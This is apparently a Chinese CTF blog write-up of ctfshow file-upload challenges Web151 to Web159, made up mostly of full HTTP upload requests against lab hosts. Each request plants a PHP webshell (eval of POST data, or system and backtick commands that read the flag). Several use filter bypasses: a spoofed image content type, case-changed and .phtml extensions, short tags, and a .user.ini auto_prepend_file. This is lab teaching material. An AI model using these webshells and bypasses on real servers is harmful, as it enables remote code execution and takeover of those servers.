【CTFshow 文件上传 Web151-159】2021.9.9 CTFshow刷题

本文最后更新于:2021年9月9日晚上7点40分

Web151

新的起点,加油!

打开题目:

image-20210909174729614

题目直接说明了是前台验证

image-20210909180437638

直接上传一张图,绕过前端js校验,bp截包后修改。

HTTP请求如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /upload.php HTTP/1.1
Host: 39985766-e05d-4db6-961e-43f027ee953d.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------313476209035142804473903416994
Content-Length: 245
Origin: http://39985766-e05d-4db6-961e-43f027ee953d.challenge.ctf.show:8080
Connection: close
Referer: http://39985766-e05d-4db6-961e-43f027ee953d.challenge.ctf.show:8080/

-----------------------------313476209035142804473903416994
Content-Disposition: form-data; name="file"; filename="shell1.php"
Content-Type: image/png

<?php
@eval($_POST[1]);
-----------------------------313476209035142804473903416994--

然后蚁剑连接upload/shell1.php即可,密码为1

官方Hint:

前端验证,抓包修改数据OK

Web152

后端不能单一校验

打开题目:

image-20210909181500507

和上一题一样,上传一样的文件,POC如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /upload.php HTTP/1.1
Host: 86504515-df89-4e9a-933e-781ad21cee2a.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------146607698723639856751513564408
Content-Length: 245
Origin: http://86504515-df89-4e9a-933e-781ad21cee2a.challenge.ctf.show:8080
Connection: close
Referer: http://86504515-df89-4e9a-933e-781ad21cee2a.challenge.ctf.show:8080/

-----------------------------146607698723639856751513564408
Content-Disposition: form-data; name="file"; filename="shell1.php"
Content-Type: image/png

<?php
@eval($_POST[1]);
-----------------------------146607698723639856751513564408--

蚁剑连接,密码为1

官方Hint:

Web153

打开题目:

image-20210909182905135

这一题利用了.user.ini配置

首先先上传shell.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /upload.php HTTP/1.1
Host: 9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------313230171228898302571574235903
Content-Length: 244
Origin: http://9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080
Connection: close
Referer: http://9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080/

-----------------------------313230171228898302571574235903
Content-Disposition: form-data; name="file"; filename="shell.phP"
Content-Type: image/png

<?php
@eval($_POST[1]);
-----------------------------313230171228898302571574235903--

然后上传.user.ini

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /upload.php HTTP/1.1
Host: 9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------313230171228898302571574235903
Content-Length: 249
Origin: http://9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080
Connection: close
Referer: http://9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080/

-----------------------------313230171228898302571574235903
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phP
-----------------------------313230171228898302571574235903--

其中auto_prepend_file是为了将目录upload/index.php文件包含shell.phP

相当于upload/index.php下多了一个require('shell.phP')

然后访问upload/index.php即可,密码为1

官方Hint:

Web154

后端不能单二校验

打开题目:

image-20210909185312666

这一题比上一题多判断了文件内容,过滤了php,因此用大写进行绕过,首先先传马。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /upload.php HTTP/1.1
Host: 0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080
Content-Length: 206
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuwwZEU5QFnYrPlD1
Origin: http://0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080
Referer: http://0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryuwwZEU5QFnYrPlD1
Content-Disposition: form-data; name="file"; filename="shell.Php"
Content-Type: image/png

<?Php
@eval($_POST[1]);
------WebKitFormBoundaryuwwZEU5QFnYrPlD1--

然后传.user.ini

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /upload.php HTTP/1.1
Host: 0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080
Content-Length: 211
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuwwZEU5QFnYrPlD1
Origin: http://0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080
Referer: http://0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryuwwZEU5QFnYrPlD1
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.Php
------WebKitFormBoundaryuwwZEU5QFnYrPlD1--

然后访问upload/index.php,密码为1

官方Hint:

Web155

后端不能单三校验

打开题目:

image-20210909190108688

文件名过滤了PHP,就用phtml,然后文件内容用短标签代替

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /upload.php HTTP/1.1
Host: a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080
Content-Length: 206
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryW4AXLYTUJ6mAfb8i
Origin: http://a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080
Referer: http://a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryW4AXLYTUJ6mAfb8i
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=
@eval($_POST[1]);
------WebKitFormBoundaryW4AXLYTUJ6mAfb8i--

.user.ini的HTTP请求如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /upload.php HTTP/1.1
Host: a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryW4AXLYTUJ6mAfb8i
Origin: http://a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080
Referer: http://a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryW4AXLYTUJ6mAfb8i
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phtml
------WebKitFormBoundaryW4AXLYTUJ6mAfb8i--

然后访问upload/index.php,密码为1

Web156

打开题目:

image-20210909191535075

这一题经过测试,过滤了中括号,因此使用{}代替[],HTTP请求如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /upload.php HTTP/1.1
Host: 8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080
Content-Length: 210
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt1eEp1v9TTsD9NT3
Origin: http://8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080
Referer: http://8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryt1eEp1v9TTsD9NT3
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=
@eval($_POST{1});
?>
------WebKitFormBoundaryt1eEp1v9TTsD9NT3--

.user.ini请求如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /upload.php HTTP/1.1
Host: 8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt1eEp1v9TTsD9NT3
Origin: http://8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080
Referer: http://8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryt1eEp1v9TTsD9NT3
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phtml
------WebKitFormBoundaryt1eEp1v9TTsD9NT3--

同样的,访问upload/index.php密码为1。

Web157

后端不能单五校验

打开题目:

image-20210909191749500

过滤了{}[];这三个符号,但是可以直接执行系统命令,HTTP请求如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /upload.php HTTP/1.1
Host: 00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080
Content-Length: 217
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQmFVF8aXG4GrSGta
Origin: http://00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080
Referer: http://00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryQmFVF8aXG4GrSGta
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=
system("nl ../flag.???")
?>
------WebKitFormBoundaryQmFVF8aXG4GrSGta--

.user.ini文件配置如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /upload.php HTTP/1.1
Host: 00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQmFVF8aXG4GrSGta
Origin: http://00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080
Referer: http://00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryQmFVF8aXG4GrSGta
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phtml
------WebKitFormBoundaryQmFVF8aXG4GrSGta--

官方Hint:

Web158

后端不能单六校验

打开题目:

image-20210909192517270

和web157一样,直接命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /upload.php HTTP/1.1
Host: 0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080
Content-Length: 217
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydHfy5QBrwHMmROBc
Origin: http://0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080
Referer: http://0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarydHfy5QBrwHMmROBc
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=
system("nl ../flag.???")
?>
------WebKitFormBoundarydHfy5QBrwHMmROBc--

.user.ini配置如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /upload.php HTTP/1.1
Host: 0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydHfy5QBrwHMmROBc
Origin: http://0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080
Referer: http://0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarydHfy5QBrwHMmROBc
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phtml
------WebKitFormBoundarydHfy5QBrwHMmROBc--

官方Hint:

Web159

师傅们可以的

打开题目:

image-20210909192928695

过滤了(){};等等,那就内敛执行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /upload.php HTTP/1.1
Host: dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080
Content-Length: 209
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary54ZnwkAMEvIGTJVv
Origin: http://dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080
Referer: http://dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary54ZnwkAMEvIGTJVv
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=
`nl ../????.???`
?>
------WebKitFormBoundary54ZnwkAMEvIGTJVv--

同样上传.user.ini

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /upload.php HTTP/1.1
Host: dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary54ZnwkAMEvIGTJVv
Origin: http://dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080
Referer: http://dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary54ZnwkAMEvIGTJVv
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phtml
------WebKitFormBoundary54ZnwkAMEvIGTJVv--

官方Hint: